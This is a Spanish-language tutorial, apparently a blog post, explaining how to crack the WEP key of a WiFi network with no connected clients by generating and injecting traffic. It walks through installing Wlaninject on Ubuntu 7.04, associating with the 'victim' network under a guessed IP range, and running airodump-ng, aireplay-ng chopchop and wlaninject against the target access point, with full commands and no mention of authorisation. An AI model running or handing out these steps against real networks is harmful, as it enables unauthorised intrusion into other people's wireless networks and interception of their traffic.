En redes wifi hay dos tipos de ataques:
- Ataques pasivos. Mediante este tipo de ataques nos limitamos a capturar tráfico de la red víctima.
- Ataques activos. Utilizamos técnicas de inyección de tráfico para generar el tráfico que necesitamos.
El problema mas común que nos encontramos en el ataque a una red WiFi con clave WEP es que no haya clientes en ella, con lo que al no haber tráfico podemos tardar muchos días en capturar el tráfico necesario para descubrir la clave WEP.
El único inconveniente es que tenemos que tener:
- Dos tarjetas de red: Una en modo managed para inyectar tráfico y otra en modo monitor para capturar tráfico.
- O bien dos máquinas, una que capture tráfico y otra que lo inyecte.
- O si tenemos un chipset atheros, podemos clonar la interface y crear una para inyectar y otra para capturar.
Vamos a explicar como hacerlo sobre Ubuntu 7.04 :
- Primero descargamos Wlaninject 0.6
- Descomprimimos Wlaninject escribiendo en consola y en el directorio donde está el archivo comprimido:
- Instalamos dependencias necesarias para la compilación, para lo que ejecutamos en consola:
sudo apt-get install -y libnet0 libnet1 libnet1-dev libpcap0.7 libpcap0.7-dev libpcap0.8 aircrack-ng
- Entramos en la carpeta que acabamos de descomprimir y compilamos e instalamos el programa:
cd wlaninject-0.6
make
sudo make install
COMO USAR WLANINYECT (sacado de www.makeandinstall.com)
- Lo primero es unirnos a la red encriptada que queremos atacar con la primera tarjeta de red WiFi, para lo que tendremos que suponer el rango de IP que usa (esto es de vital importancia, ya que si no acertamos el ataque no valdrá de nada). Los rangos más comunes son 192.168.1.X y 192.168.0.X (tambien podemos mirar que rango usa por defecto el router que estamos atacando). Por lo tanto vamos a unirnos a la red suponiendo que tiene un rango 192.168.1.X y que nuestra interface es ath0, para lo que escribimos:
sudo iwconfig ath0 channel CANAL
sudo iwconfig ath0 essid NOMBREDELARED
sudo iwconfig ath0 ap MAC_DEL_PUNTO_DE_ACCESO
sudo iwconfig ath0 key s:AAAAAAAAAAAAA
sudo ifconfig ath0 192.168.1.250 up
- El siguiente proceso es variable dependiendo de si tenemos buena señal o mala, para saber los rates disponibles a los que podemos conectar (las velocidades de transmision) escribimos el siguiente código:
iwlist ath0 rate
- Suponiendo que nos ha devuelto un rate bajo, como 1M, vamos a obligar a que la conexion se efectúe a ese rate, escribiendo:
sudo iwconfig ath0 rate 1M
- Ahora, y antes de utilizar WlanInyect, ponemos a capturar paquetes a Airodump-ng y ponemos Aireplay-ng a la escucha del paquete ARP que se va a generar para que lo inyecte, para lo que escribimos:
sudo airodump-ng -c CANAL -w ARCHIVOGUARDAIV ath1
sudo aireplay-ng -4 -b MACDELPUNTODEACCESO -f1 ath1
- Ponemos a trabajar a WlanInject:
wlaninject -e NOMBREDELARED -b MACDELPUNTODEACCESO -i ath0
En el ejemplo, hemos usado:
- wlaninject con la interface ath0 (la que hemos puesto en modo managed)
- Y aireplay-ng con la interface ath1 (la que hemos puesto en modo monitor)
Recordemos que también podríamos usar dos máquinas. Una es la que inyecta tráfico (en la que pondríamos la interfaz de red en modo managed) y la otra es la que captura tráfico (pondríamos su interfaz de red en modo monitor).
Ahora solo nos queda esperar a que Aireplay detecte el paquete ARP generado y pulsar Y para que lo inyecte, La orden que debemos ejecutar para que aireplay se ponga a la escucha es:
sudo aireplay-ng -4 -b MACDELPUNTODEACCESO -f1 ath1
